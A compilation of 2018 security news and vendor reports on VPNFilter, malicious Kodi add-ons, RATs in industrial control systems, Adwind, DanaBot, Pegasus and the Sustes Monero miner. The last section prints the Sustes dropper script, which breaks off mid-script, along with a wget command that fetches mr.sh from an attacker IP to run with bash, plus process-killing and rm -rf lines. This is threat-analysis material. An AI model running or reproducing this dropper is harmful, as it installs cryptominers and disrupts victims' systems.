Don’t leave USBs lying around or on display
Kaspersky Lab’s security solutions, such as Kaspersky Endpoint Security for Windows, provide security and encryption for all removable media including USB devices.
Talos experts published technical details for other seven VPNFilter modules
28.9.2018 securityaffairs Virus
Experts from Talos continues to monitor the evolution of the VPNFilter malware, it is more powerful than previously thought.
In May, security firm Talos along with other cybersecurity firms and law enforcement agencies have uncovered a huge botnet dubbed VPNFilter, composed of more than 500,000 compromised routers and network-attached storage (NAS) devices.
The malicious code targets dozens of types of devices from Linksys, MikroTik, Netgear, TP-Link, QNAP, ASUS, D-Link, Huawei, Ubiquiti, UPVEL and ZTE.
VPNFilter is a multi-stage, modular strain of malware that has a wide range of capabilities for both cyber espionage and sabotage purpose.
Researchers believe the nation-state malware was developed by the same author of the BlackEnergy malware.
On May 8, Talos researchers observed a spike in VPNFilter infection activity, most infections in Ukraine and the majority of compromised devices contacted a separate stage 2 C2 infrastructure at the IP 46.151.209[.]33.
According to the experts at Fortinet that analyzed the malware, VPNFilter operates in the following three stages:
Stage 1 implements a persistence mechanism and redundancy; it allows the malware to survive a reboot.
Stage 2 includes data exfiltration, command execution, file collection, and device management. Only in some versions it is present a self-destruct module.
Stage 3 includes multiple modules that perform different tasks. At the time researchers identified only three modules:
A packet sniffer for traffic analysis and potential data exfiltration.
The monitoring of MODBUS SCADA protocols.
Communication with obfuscated addresses via TOR
Now a new report published by Talos includes technical details for other seven VPNFilter modules that are used by the attackers to map networks and compromise endpoints connected to infect devices, obfuscate and encrypt malicious traffic, exfiltrate data, communicate to the C&C, scan the compromised networks for new potential victims that can be reached from an infected device, and build a distributed network of proxies that may be used in future attacks to hide the source of malicious traffic.
Talos analysis shed the light on many aspects of the malware, except for the way the VPNFilter gains initial access to devices.
It is still unclear is the threat actors behind the botnet is attempting to reconstitute their access, but Talos researchers believe VPNFilter appears to have been completely neutralized.
“Based on our telemetry and information from our partners, it appears that VPNFilter has been entirely neutralized since we and our international coalition of partners (law enforcement, intelligence organizations, and the Cyber Threat Alliance) countered the threat earlier this year. Most C2 channels for the malware have been mitigated.” reads the report published by Talos.
“The stage 2 implants were non-persistent, so most have likely been cleared from infected devices. We have seen no signs of the actor attempting to reconnect with devices that may still have the persistent stage 1 with an open listener.”
Experts conclude the attackers behind VPNFilter are extremely capable and driven by their mission priorities, for this reason, they will continue to improve their arsenal to achieve their mission objective(s).
New VPNFilter Modules Reveal Extensive Capabilities
27.9.2018 securityweek Virus
The recently discovered VPNFilter malware has even more capabilities than previously thought, researchers at Cisco Talos determined after identifying seven new modules.
VPNFilter’s existence was brought to light in May after the malware was analyzed by several cybersecurity firms. The malware infected at least half a million routers and network-attached storage (NAS) devices across more than 50 countries – it targets over 50 types of devices from Linksys, MikroTik, Netgear, TP-Link, QNAP, ASUS, D-Link, Huawei, Ubiquiti, UPVEL and ZTE.
Discovery of New VPNFilter Modules Shows New Malware Capabilities
The malware, whose main target appears to be Ukraine, has been linked to Russia. Cybersecurity firms and authorities in the United States have taken steps to neutralize VPNFilter, but Cisco Talos, which has spearheaded the investigation, says it can still be difficult to detect the malware in the wild.
The modules found initially by researchers allow VPNFilter to intercept data passing through the compromised device, monitor the network for communications over the Modbus SCADA protocol, and make an infected device unusable. Additional modules described later by Talos are designed for data exfiltration and JavaScript injection, and removing the malware from a device.
Talos has now published the results of its analysis into seven other VPNFilter modules that allow attackers to map networks and exploit endpoints connected to infected devices, obfuscate and encrypt data exfiltration and C&C communications, find new potential victims that can be reached from a compromised device, and build a distributed network of proxies that may be useful in other operations for obfuscating the source of attack traffic.
The company has shared detailed technical information for each of the newly analyzed modules.
The discovery and analysis of these modules has answered most unanswered questions about the malware itself, Talos said, but researchers have yet to determine exactly how the malware gains initial access to devices. While it doesn’t have definitive proof, Talos believes the most likely attack vector is through the exploitation of known vulnerabilities affecting devices.
Another question that remains unanswered is whether the threat group behind VPNFilter is trying to regain access. While some researchers reported in early June that the hackers controlling the botnet had continued targeting routers in Ukraine, Talos now says VPNFilter appears to have been completely neutralized.
However, the adversary may have not abandoned the foothold it gained into small and home office (SOHO) networks, and it might be trying to regain access to devices by re-exploiting vulnerabilities and dropping a new piece of malware.
“Have they given up on having broad worldwide SOHO access in favor of a more tailored approach only going after specific key targets?” Talos said. “Whatever the answers may be, we know that the actor behind VPNFilter is extremely capable and driven by their mission priorities to continually maneuver to achieve their goals. In one form or another, they continue to develop and use the tools and frameworks necessary to achieve their mission objective(s).”
Crooks leverages Kodi Media Player add-ons for malware distribution
26.9.2018 securityaffairs Virus
Security experts have spotted a Monero cryptomining campaign that abused Kodi add-ons to deliver miner that target both Linux and Windows systems.
Crooks are abusing Kodi Media Player to distribute malware, researchers from ESET recently spotted a cryptomining campaign that compromised about over 5,000 computers.
Kodi users can add new functionality by installing add-ons that are available on the official Kodi repository and in several third-party stores
An attacker can deliver malicious code by compromising the add-ons that are automatically updated by the Kodi media player.
According to ESET researchers, attackers can target Kodi to spread malware using three different mechanisms:
They add the URL of a malicious repository to their Kodi installation so as to download some add-ons. The malicious add-on is then installed whenever they update their Kodi add-ons.
They install a ready-made Kodi build that includes the URL of a malicious repository. The malicious add-on is then installed whenever they update their Kodi add-ons.
They install a ready-made Kodi build that contains a malicious add-on but no link to a repository for updates. They are initially compromised, though receive no further updates to the malicious add-on. However, if the cryptominer is installed, it will persist and receive updates.
The malicious code distributed in this campaign is able to compromise both Windows and Linux platforms. It is a multi-stage malware that implements measures to make it hard for analysts to trace the malicious code back to the add-on.
Attackers added the malicious add-on to the XvMBC, Bubbles, and Gaia repositories.
Most of the infections were observed in the United States, Israel, Greece, the United Kingdom, and the Netherlands.
“After victims add the malicious repository to their Kodi installation, the malicious repository serves an add-on named script.module.simplejson – a name matching that of a legitimate add-on used by many other add-ons. However, while other repositories only have the script.module.simplejson add-on at version 3.4.0, the malicious repository serves this add-on with version number 3.4.1.” continues the repository.
“Since Kodi relies on version numbers for update detection, all users with the Auto Update feature enabled (which is a common default setting) will automatically receive script.module.simplejson version 3.4.1 from the malicious repository.”
Although the main repositories used in this campaign are now either closed or cleaned, many devices are still running the malicious add-ons to mine Monero.
Researchers from ESET, revealed that crooks behind the campaign have already mined about $6,700 worth of Monero.
“According to these statistics of the malware authors’ Monero wallet, provided by Nanopool, a minimum of 4774 victims are affected by the malware at the time of writing, and have generated 62,57 XMR (about 5700 EUR or 6700 USD) as of this writing.” concludes the report.
Further details, including the IoCs, are available in the report.
Threats posed by using RATs in ICS
25.9.2018 Kaspersky ICS Virus
While conducting audits, penetration tests and incident investigations, we have often come across legitimate remote administration tools (RAT) for PCs installed on operational technology (OT) networks of industrial enterprises. In a number of incidents that we have investigated, threat actors had used RATs to attack industrial organizations. In some cases, the attackers had stealthily installed RATs on victim organizations’ computers, while in other cases, they had been able to use the RATs that were installed in the organization at the time of the attacks. These observations prompted us to analyze the scope of the threat, including the incidence of RATs on industrial networks and the reasons for using them.
Methodology
The statistical data presented in this paper was collected using the Kaspersky Security Network (KSN) from ICS computers protected by Kaspersky Lab products that Kaspersky Lab ICS CERT categorizes as part of the industrial infrastructure at organizations. This group includes Windows computers that perform one or several of the following functions:
supervisory control and data acquisition (SCADA) servers;
data storage servers (Historian);
data gateways (OPC);
stationary workstations of engineers and operators;
mobile workstations of engineers and operators;
Human Machine Interface (HMI).
As part of our research, we considered and analyzed all popular RATs for Windows, with the exception of Remote Desktop, which is part of the Windows operating system. Our research into this RAT is ongoing and will be presented in the next paper of the series.
The use of RATs in ICS
According to KSN data, in the first half of 2018, legitimate RATs (programs categorized as not-a-virus: RemoteAdmin) were installed and used on one ICS computer in three.
Percentage of ICS computers that have RATs legitimately installed on them (download)
The statistics support our observations: RATs are indeed often used on OT networks of industrial enterprises. We believe this could be due to attempts to reduce costs associated with maintaining ICS and minimize the response time in the event of malfunction.
As we were able to find out, remote access to computers on the OT network is not restricted to administrators and engineers inside the enterprise network’s perimeter. It can also be made available via the internet to users outside the enterprise network perimeter. Such users can include representatives of third-party enterprises – employees of system integrators or ICS vendors, who use RATs for diagnostics, maintenance and to address any ICS malfunctions. As our industrial network security audits have shown, such access is often poorly supervised by the enterprise’s responsible employees, while remote users connecting to the OT network often have excessive rights, such as local administrator privileges, which is obviously a serious issue in terms of ensuring the information security of industrial automation systems.
From interviews with engineers and operators of various industrial systems that we have audited, and based on an analysis of ICS user documentation, we have determined that RATs are most commonly used on industrial networks according to the following scenarios:
To control/monitor HMI from an operator workstation (including displaying information on a large screen);
To control/maintain HMI from an engineering workstation;
To control SCADA from an operator workstation;
To provide SCADA maintenance from an engineering workstation or a computer of a contractor/vendor (from an external network);
To connect multiple operators to one operator workstation (thin client-like architecture used to save money on licenses for the software used on operator workstations);
To connect to a computer on the office network from the OT network via HMI and perform various tasks on that computer (access email, access the internet, work with office documents, etc.).
Some of the scenarios listed above indicate that the use of RATs on the OT network can be explained by operational requirements, which means that giving up the use of RATs would unavoidably entail modifications to work processes. At the same time, it is important to realize that an attack on a poorly protected RAT could easily cause disruptions to the industrial process and any decisions on using RATs on the OT network should be made with this in mind. Tight controls on the use of RATs on the OT network would help to reduce the attack surface and the risk of infection for systems administered remotely.
TOP 20 countries by percentage of ICS computers on which RATs were used at least once during the first half of 2018 (to all ICS computers in each country) (download)
Scenarios of RAT installation on ICS computers
According to our research, there are three most common scenarios of RAT installation on ICS computers:
Installation of ICS software distribution packages that include RATs (using separate distribution packages or ICS software installers). RATs included in ICS software distribution packages make up 18.6% of all RATs we have identified on ICS computers protected by Kaspersky Lab products.
Percentage of RATs bundled with ICS products to all RATs found on ICS computers (download)
Deliberate installation of RATs by personnel or suppliers – network administrators, engineers, operators, or integrator companies. We do not undertake to judge whether these installations are legitimate. Based on our experience of industrial network audits and incident investigation, we can state that many such installations do not comply with the organization’s information security policy and some are installed without the knowledge of respective enterprises’ responsible employees.
Stealthy installation of RATs by malware. An example of this is a recent attack that we have investigated (see below).
RAT-related threats to ICS
Threats associated with the use of RATs on industrial networks are not always obvious, nor are the reasons for which RATs are used.
Most of the RATs we have identified on industrial systems have the following characteristics that significantly reduce the security level of the host system:
Elevated privileges – the server part of a RAT is often executed as a service with system privileges, i.e., NT SYSTEM;
No support for restricting local access to the system / client activity;
Single-factor authentication;
No logging of client activity;
Vulnerabilities (our report on zero-day vulnerabilities identified in popular RAT systems that are used, among other applications, in products by many ICS vendors, will be published by the end of the year);
The use of relay servers (for reverse connections) that enable RATs to bypass NAT and firewall restrictions on the network perimeter.
The most critical RAT-related problem is the use of elevated privileges and the absence of any means to limit these privileges (or to restrict a remote user’s local access). In practice, this means that if attackers (or malware) gain access to a remote user’s computer, steal authentication data (login/password), hijack an active remote administration session or successfully attack a vulnerability in the RAT’s server part, they will gain unrestricted control of the ICS system. By using relay servers for reverse connections, attackers can also connect to these RATs from anywhere in the world.
There are also other issues that affect RATs built into ICS software distribution packages:
RAT components and distribution packages are rarely updated (even if new versions of ICS distribution packages are released). This makes them more likely to contain vulnerabilities;
In the vast majority of cases, the default password is used – it is either hardcoded into the RAT by the ICS software vendor or specified in the documentation as “recommended”.
RATs are legitimate software tools that are often used on industrial networks, which means it can be extremely difficult to distinguish attacks involving RATs from legitimate activity. In addition, since the information security service and other employees responsible for ICS security are often unaware that a RAT is installed, the configuration of RATs is in most cases not analyzed when auditing the security of an industrial network. This makes it particularly important to control by whom, when and for what purposes RATs are used on the industrial network and to ensure that it is completely impossible to use RATs without the knowledge of employees responsible for the OT network’s information security.
Attacks of threat actors involving RATs
Everything written above applies to potential threats associated with the use of RATs.
Based on our analysis of KSN statistics, we were able to identify a number of attacks and malware infection attempts involving RATs installed on ICS computers. In most cases, attacks were based on the following scenarios (in the descending order of attack incidence):
A brute force network attack from the local network or the internet designed to crack logins/passwords;
An attacker or malware using a RAT to download and execute malware using stolen or cracked authentication credentials;
A remote user (probably a legitimate user deceived by attackers) using a RAT to download a Trojan to an ICS computer and then executing it; the Trojan can be disguised as an office document, non-industrial software (a game, multimedia software, etc.), a crack/keygen for office, application or industrial software, etc.;
A network attack from the local network or the internet on the server part of the RAT using exploits.
Brute force type network attacks (designed to crack logins/passwords) are the most common: their implementation does not require any special knowledge or skills and the software used in such attacks is publicly available.
It cannot be determined based on available data who connects to a RAT’s server part installed on an ICS computer – a legitimate user, an attacker or malware – or why. Consequently, we can only guess whether this activity represents a targeted attack, sabotage attempts or a client’s error.
Network attacks from the internet were most probably conducted by threat actors using malware, penetration testing tools or botnets.
Network attacks from the local network could indicate the presence of attackers (possibly including an insider) on the network. Another possibility is that there is a compromised computer on the local network that is either infected with malware or is used by the attacker as a point of presence (if the authentication credentials were compromised earlier).
Attacks on industrial enterprises using RMS and TeamViewer
In the first half of 2018, Kaspersky Lab ICS CERT identified a new wave of phishing emails disguised as legitimate commercial offers. Although the attacks targeted primarily industrial companies within the territory of Russia, the same tactics and tools can be used in attacks on industrial companies in any country of the world.
The malware used in these attacks installs legitimate remote administration software on the system — TeamViewer or Remote Manipulator System/Remote Utilities (RMS). In both cases, a system DLL is replaced with a malicious library to inject malicious code into a legitimate program’s process. This provides the attackers with remote control of the infected systems. Various techniques are used to mask the infection and the activity of the software installed on the system.
If necessary, the attackers download an additional malware pack to the system, which is specifically tailored to the attack on each individual victim. This set of malware may contain spyware, additional remote administration tools that extend the threat actor’s control of infected systems, malware to exploit vulnerabilities in the operating system and application software, as well as the Mimikatz utility, which makes it possible to obtain account data for Windows accounts.
According to available data, the attackers’ main goal is to steal money from victim organizations’ accounts, but possible attack scenarios are not limited to the theft of funds. In the process of attacking their targets, the attackers steal sensitive data belonging to target organizations, their partners and customers, carry out surreptitious surveillance of the victim companies’ employees, and record audio and video using devices connected to infected machines. Clearly, on top of the financial losses, these attacks result in leaks of victim organizations’ sensitive data.
Multiple attacks on an auto manufacturer
A characteristic example of attacks based on the second scenario was provided by attacks on the industrial network of a motor vehicle manufacturing and service company, in particular, on computers designed to diagnose the engines and onboard systems of trucks and heavy-duty vehicles. Multiple attempts to conduct such attacks were blocked by Kaspersky Lab products.
A RAT was installed and intermittently used on at least one of the computers in the company’s industrial network. Starting in late 2017, numerous attempts to launch various malicious programs using the RAT were blocked on the computer. Infection attempts were made regularly over a period of several months – 2-3 times a week, at different times of the day. Based in part on other indirect indicators, we believe that RAT authentication data was compromised and used by attackers (or malware) to attack the enterprise’s computers over the internet.
After gaining access to the potential victim’s infrastructure via the RAT, the attackers kept trying to choose a malicious packer that would enable them to evade antivirus protection.
The blocked programs included modifications of the malware detected by Kaspersky Lab products as Net-Worm.Win32.Agent.pm. When launched this worm immediately begins to proliferate on the local network using exploits for the MS17-010 vulnerabilities – the same ones that were published by ShadowBrokers in the spring of 2017 and were used in attacks by the infamous WannaCry and ExPetr cryptors.
The Nymaim Trojan family was also blocked. Representatives of this family are often used to download modifications of botnet agents from the Necus family, which in turn have often been used to infect computers with ransomware from the Locky family.
Conclusion
Remote administration tools are widely used on industrial networks for ICS monitoring, control and maintenance. The ability to manipulate the ICS remotely significantly reduces maintenance costs, but at the same time, uncontrolled remote access, the inability to provide 100% verification of the remote client’s legitimacy, and the vulnerabilities in RAT code and configuration significantly increase the attack surface. At the same time, RATs, along with other legitimate tools, are increasingly used by attackers to mask malicious activity and make attribution more difficult.
To reduce the risk of cyberattacks involving RATs, we recommend the following high-priority measures:
Audit the use of application and system remote administration tools on the industrial network, such as VNC, RDP, TeamViewer, and RMS / Remote Utilities. Remove all remote administration tools that are not required by the industrial process.
Conduct an audit and disable remote administration tools which came with ICS software (refer to the relevant software documentation for detailed instructions), provided that they are not required by the industrial process.
Closely monitor and log events for each remote control session required by the industrial process; remote access should be disabled by default and enabled only upon request and only for limited periods of time.
New Adwind Campaign Targets Linux, Windows, and macOS
25.9.2018 securityweek Virus
Adwind remote access Trojan (RAT) samples detected in a recently campaign were configured to gain persistence on Linux, Windows, and macOS systems, Cisco Talos warns.
The attacks featured the Adwind 3.0 RAT and employed a variant of the Dynamic Data Exchange (DDE) code injection attack on Microsoft Excel, ReversingLabs and Cisco Talos security researchers discovered.
The campaign started on August 26 and mainly targeted users in Turkey, with 75% of the observed requests made from that country. Some of the victims were located in Germany, likely members of the Turkish community there. The spam emails carrying malicious documents were written in Turkish.
The attackers used at least two different droppers for their malicious payload, in the form of CSV and XLT files. Both of them, however, would leverage a new variant of the DDE code injection attack, one that remained undetected until now.
In a report published Monday, Talos’ researchers explain that the dropper can actually have one of over 30 file extensions. While not all of them would be opened in Microsoft Excel by default, there are scripts that would start Excel with non-default files as well, making them viable in this attack scenario.
“Because the beginning of the file can contains anything, there is no header to be checked, which might confuse the antivirus additionally engines could expect ASCII characters for the CSV format. Other formats may be considered corrupted has they might not follow the expected format,” Talos reveals.
Excel also displays warnings to the user regarding the execution of code. One warning informs that the file, which is not a real XLT document, might be corrupted, asking the user if they are sure they want to open it. Two other warnings tell the user that the document will execute system applications.
If the user accepts all three warnings, the calculator application is executed on the system. The purpose of the campaign, however, is to inject code that would create and execute a Visual Basic Script that uses bitasdmin, a Microsoft tool to download or upload jobs and monitor their progress, to fetch the final payload.
The payload is a Java archive file containing code packed with the demo version of Allatori Obfuscator version 4.7.
The packed malware is a version of the Adwind RAT v3.0, configured to achieve persistence on all three major desktop platforms: Windows, Linux, and macOS. The persistence mechanism, however, is different for each platform.
Employed by several malicious groups for their nefarious purposes, the Trojan provides operators with the ability to execute all kind of commands on the victim machines, to log keystrokes, take screenshots, take pictures, and transfer files.
“The DDE variant used by the droppers in this campaign is a good example on how signature based antivirus can be tricked. It is also a warning sign regarding the file extension scanning configurations. This kind of injection is known for years, however this actor found a way to modify it in order to have an extremely low detection ratio,” Talos concludes.
DanaBot banking Trojan evolves and now targets European countries
23.9.2018 securityaffairs Virus
Security experts at ESET have recently observed a surge in activity of DanaBot banking Trojan that is now targeting Poland, Italy, Germany, Austria, and as of September 2018, Ukraine.
Security experts at ESET have recently observed a surge in activity of DanaBot banking Trojan that was first spotted earlier this year.
DanaBot is a multi-stage modular banking Trojan written in Delphi, the malware allows operators to add new functionalities by adding new plug-ins.
Below some plug-ins that have been used in previous attacks against Australian banks in May 2018:
VNC plug-in – establishes a connection to a victim’s computer and remotely controls it
Sniffer plug-in – injects malicious scripts into a victim’s browser, usually while visiting internet banking sites
Stealer plug-in – harvests passwords from a wide variety of applications (browsers, FTP clients, VPN clients, chat and email programs, poker programs etc.)
TOR plug-in – installs a TOR proxy and enables access to .onion web sites
When it was analyzed by Proofpoint, its experts speculated the threat has been under active development.
The banking Trojan initially targeted Australia and Poland users, then it has expanded in other countries, including Italy, Germany, Austria, and as of September 2018, Ukraine.
The campaign targeting Poland is still ongoing and is the largest one, attackers used spam messages to compromise victims leveraging the Brishloader technique, a combination of PowerShell and VBS scripts.
Earlier September, a series of smaller campaigns targeted banks in Italy, Germany, and Austria.
“Further to this development, on September 8, 2018, ESET discovered a new DanaBot campaign targeting Ukrainian users.” reads the analysis published by ESET.
“Figure 2 shows a spike in the DanaBot detection rate at the turn of August and again in September 2018, as seen in our telemetry data.”
Expert noticed the attackers have introduced several changes to the DanaBot plug-ins since the previously reported campaigns, for example, the Stealer plug-in was also compiled for 64-bit version since August 25, 2018.
Since the beginning of September 2018, the author of DanaBot also implemented the RDP plug-in based on the open-source project RDPWrap that provides Remote Desktop Protocol connections to Windows machines that normally do not support it.
The malware also implemented the RDP plug-in because the protocol is less likely to be blocked by firewalls, experts also highlighted that the RDPWrap allows several users to use the same machine concurrently. This aspect is very important because the attackers can perform reconnaissance operations while the victim is still using the machine.
DanaBot is a very active threat, its operators continue to improve it while targeting European countries.
“The new features introduced in these latest campaigns indicate the attackers behind DanaBot continue to make use of the malware’s modular architecture to increase their reach and success rate.” concludes ESET.
Further details, including IoCs are reported in the analysis published by ESET.
Report Reveals Widespread Use of Pegasus Spyware
22.9.2018 securityweek Virus
As part of a 2-year investigation into NSO Group’s sophisticated Pegasus spyware, Citizen Lab has identified 45 countries where operators might be leveraging the malware to conduct surveillance operations.
First detailed in August 2016, Pegasus is developed by NSO Group Technologies Ltd, a Herzelia, Israel-based company founded in 2010 and now owned by U.S. private equity firm Francisco Partners.
In 2016, Citizen Lab and Lookout revealed that Pegasus was targeting Apple devices using a chain of vulnerabilities referred to as Trident, which Apple was quick to patch. The installation process requires the intended victim to click on a specially crafted exploit link that delivers a chain of exploits that compromise the phone.
Once installed, the spyware contacts the command and control (C&C) server to receive and execute commands and to exfiltrate the target’s information, including passwords, contact lists, calendar events, text messages, and live voice calls from popular mobile messaging apps. It can also turn on the phone’s camera and microphone for recording purposes.
The modular, highly customizable software is sold exclusively to governments and law enforcement agencies, supposedly for fighting crime and terror, but was observed being abused for surveillance purposes.
An investigation Citizen Lab has conducted between August 2016 and August 2018 not only confirmed the use of Pegasus to target activists, journalists, and human rights fighters, but also painted a more detailed picture of how widespread the tool’s operators are.
The organization found 1,091 IP addresses that matched their fingerprint for Pegasus, as well as 1,014 domain names that pointed to those IPs. The investigation also revealed that at least 10 Pegasus operators (assumed to be NSO customers) might be actively engaged in cross-border surveillance.
“We developed and used Athena, a novel technique to cluster some of our matches into 36 distinct Pegasus systems, each one which appears to be run by a separate operator,” Citizen Lab notes in a report published on Tuesday, which also details the techniques used to fingerprint Pegasus and to investigate operators.
The organization found significant Pegasus operations in six countries previously “linked to abusive use of spyware to target civil society, including Bahrain, Kazakhstan, Mexico, Morocco, Saudi Arabia, and the United Arab Emirates.”
Furthermore, the spyware is apparently “in use by countries with dubious human rights records and histories of abusive behaviour by state security services.”
The countries with suspected Pegasus infections are Algeria, Bahrain, Bangladesh, Brazil, Canada, Cote d’Ivoire, Egypt, France, Greece, India, Iraq, Israel, Jordan, Kazakhstan, Kenya, Kuwait, Kyrgyzstan, Latvia, Lebanon, Libya, Mexico, Morocco, the Netherlands, Oman, Pakistan, Palestine, Poland, Qatar, Rwanda, Saudi Arabia, Singapore, South Africa, Switzerland, Tajikistan, Thailand, Togo, Tunisia, Turkey, the UAE, Uganda, the United Kingdom, the United States, Uzbekistan, Yemen, and Zambia.
Last year, the Pegasus spyware was found to have targeted dozens of Mexican lawyers, journalists, human rights defenders, opposition politicians, anti-corruption advocates, and an international investigation operating in Mexico. Even after the report, however, three separate operators continue to be active in the country as of July 2018. A lawsuit was filed in Tel Aviv in early September 2018.
Citizen Lab also identified at least six operators with significant operations in the Gulf Cooperation Council (GCC) countries in the Middle East: at least two focus on the UAE, one on Bahrain, and one on Saudi Arabia.
“Three operators may be conducting surveillance beyond the MENA region, including in Canada, France, Greece, the United Kingdom, and the United States,” Citizen Lab says.
The investigation also revealed five operators active in Africa: one predominantly focusing on the West African country of Togo, and one focused on Morocco (which may also spy on targets in Algeria, France, and Tunisia). There are also several operators in Israel: four operate domestically and one operating in other countries as well, including the Netherlands, Palestine, Qatar, Turkey, and the USA.
In their report, Citizen Lab provides further information on the identified operators focusing on specific regions, such as Americas, Africa, Asia, Europe, and the Middle East. Furthermore, the organization details a series of operators that appear to lack a clear focus, but all using a large degree of customization in their operations.
“Ten Pegasus operators appear to be conducting surveillance in multiple countries. While we have observed prior cases of cross-border targeting, this investigation suggests that cross-border targeting and/or monitoring is a relatively common practice. The scope of this activity suggests that government-exclusive spyware is widely used to conduct activities that may be illegal in the countries where the targets are located,” Citizen Lab notes.
Before publishing their report, Citizen Lab notified NSO of their findings, but the company once again said their “product is licensed to government and law enforcement agencies for the sole purpose of investigating and preventing crime and terror.” NSO also informed the organization of the existence of a Business Ethics Committee that includes outside experts, which reviews and approves each transaction, and which is authorized to reject or cancel agreements.
“We have seen no public details concerning the membership or deliberations of this committee but encourage NSO Group to disclose them. NSO’s statements about a Business Ethics Committee recall the example of Hacking Team’s ‘outside panel of technical experts and legal advisors … that reviews potential sales’,” Citizen Lab notes.
“There are multiple problems with Citizen Lab’s latest report. Most significantly, the list of countries in which NSO is alleged to sell or where our customers presumably operate the products is simply inaccurate. NSO does not sell its products in many of the countries listed. The product is only licensed to operate in countries approved under our Business Ethics Framework and the product will not operate outside of approved countries. As an example, the product is specifically designed to not operate in the USA,” NSO told Citizen Lab on Tuesday.
In 2016, however, Citizen Lab was able to infect a device in the United States with Pegasus spyware although the infection link had been sent to UAE activist Ahmed Mansoor.
Legitimate RATs Pose Serious Risk to Industrial Systems
22.9.2018 securityweek Virus
Remote administration tools (RATs) installed for legitimate purposes in operational technology (OT) networks can pose a serious security risk, allowing malicious actors to abuse them in attacks aimed at industrial organizations, Kaspersky Lab warns.
A report published on Friday by the security firm reveals that, on average, in the first half of 2018, legitimate RATs were found on more than two-thirds of computers used for industrial control systems (ICS).
The highest percentage of ICS computers with RATs were found in Kazakhstan, where over half of all analyzed systems had a remote admin tool installed. In the United States, 29% of the devices monitored by Kaspersky had a legitimate RAT. It’s worth noting that this does not include the remote desktop tool found by default in Windows.
Industrial organizations may use RATs to control or monitor HMIs or SCADA systems from a workstation, to connect multiple operators to one workstation, or connect computers on the corporate network to devices on the OT network.
“Some of [these scenarios] indicate that the use of RATs on the OT network can be explained by operational requirements, which means that giving up the use of RATs would unavoidably entail modifications to work processes,” Kaspersky researchers said.
In 18% of cases observed by the security firm, legitimate RATs were installed as part of the ICS software distribution package, while the rest were specifically installed by employees or suppliers. There are also cases where attackers stealthily install RATs to gain access to the targeted organization’s systems.
Legitimately installed tools can introduce serious security risks as they often require elevated privileges, they don’t support two-factor authentication, they don’t restrict local access, they are impacted by vulnerabilities, and they make use of relay servers to bypass security restrictions applied to the network perimeter.
“The most critical RAT-related problem is the use of elevated privileges and the absence of any means to limit these privileges (or to restrict a remote user’s local access). In practice, this means that if attackers (or malware) gain access to a remote user’s computer, steal authentication data (login/password), hijack an active remote administration session or successfully attack a vulnerability in the RAT’s server part, they will gain unrestricted control of the ICS system. By using relay servers for reverse connections, attackers can also connect to these RATs from anywhere in the world,” researchers explained.
Register for SecurityWeek’s 2018 ICS Cyber Security Conference
Another problem with the use of RATs is that they make it very difficult for security services and teams to distinguish legitimate activity from malicious activity.
Kaspersky has seen several attacks where malicious actors had installed tools such as TeamViewer or Remote Manipulator System (RMS). However, in the case of a car manufacturer, experts noticed that hackers had abused a tool installed for legitimate purposes after obtaining its access credentials.
“The ability to manipulate the ICS remotely significantly reduces maintenance costs, but at the same time, uncontrolled remote access, the inability to provide 100% verification of the remote client’s legitimacy, and the vulnerabilities in RAT code and configuration significantly increase the attack surface. At the same time, RATs, along with other legitimate tools, are increasingly used by attackers to mask malicious activity and make attribution more difficult,” Kaspersky said.
Sustes Malware: CPU for Monero
21.9.2018 securityaffairs Virus
Sustes Malware doesn’t infect victims by itself, but it is spread via brute-force activities with special focus on IoT and Linux servers.
Today I’d like to share a simple analysis based on a fascinating threat that I like to call Sustes (you will see name genesis in a bit).
Everybody knows Monero cryptocurrency and probably everybody knows that it has built upon privacy, by meaning It’s not that simple to figure out Monero wallet balance. Sustes (Mr.sh) is a nice example of Pirate-Mining and even if it’s hard to figure out its magnitude, since the attacker built-up private pool-proxies, I believe it’s interesting to fix wallet address in memories and to share IoC for future Protection. So, let’s have a closer look at it.
Monero stops you trying to check wallet balance
Sustes Malware doesn’t infect victims by itself (it’s not a worm) but it is spread over the exploitation and brute-force activities with special focus on IoT and Linux servers.
The initial infection stage comes from a custom wget (http:\/\/192[.]99[.]142[.]226[:]8220\/mr.sh ) directly on the victim machine followed by a simple /bin/bash mr.sh.
The script is a simple bash script which drops and executes additional software with a bit of spicy. The following code represents the mr.sh content as a today (ref. blog post date).
#!/bin/bash
mkdir /var/tmp
chmod 777 /var/tmp
pkill -f getty
netstat -antp | grep '27.155.87.59' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '27.155.87.59' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'CLOSE_WAIT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '121.18.238.56' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '121.18.238.56' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '103.99.115.220' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '103.99.115.220' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
pkill -f /usr/bin/.sshd
rm -rf /var/tmp/j*
rm -rf /tmp/j*
rm -rf /var/tmp/java
rm -rf /tmp/java
rm -rf /var/tmp/java2
rm -rf /tmp/java2
rm -rf /var/tmp/java*
rm -rf /tmp/java*
chmod 777 /var/tmp/sustes
ps aux | grep -vw sustes | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
ps ax | grep /tmp/ | grep -v grep | grep -v 'sustes\|sustes\|ppl' | awk '{print $1}' | xargs kill -9
ps ax | grep 'wc.conf\|wq.conf\|wm.conf' | grep -v grep | grep -v 'sustes\|sustes\|ppl' | awk '{print $1}' | xargs kill -9
DIR="/var/tmp"
if [ -a "/var/tmp/sustes" ]
then
if [ -w "/var/tmp/sustes" ] && [ ! -d "/var/tmp/sustes" ]
then
if [ -x "$(command -v md5sum)" ]
then
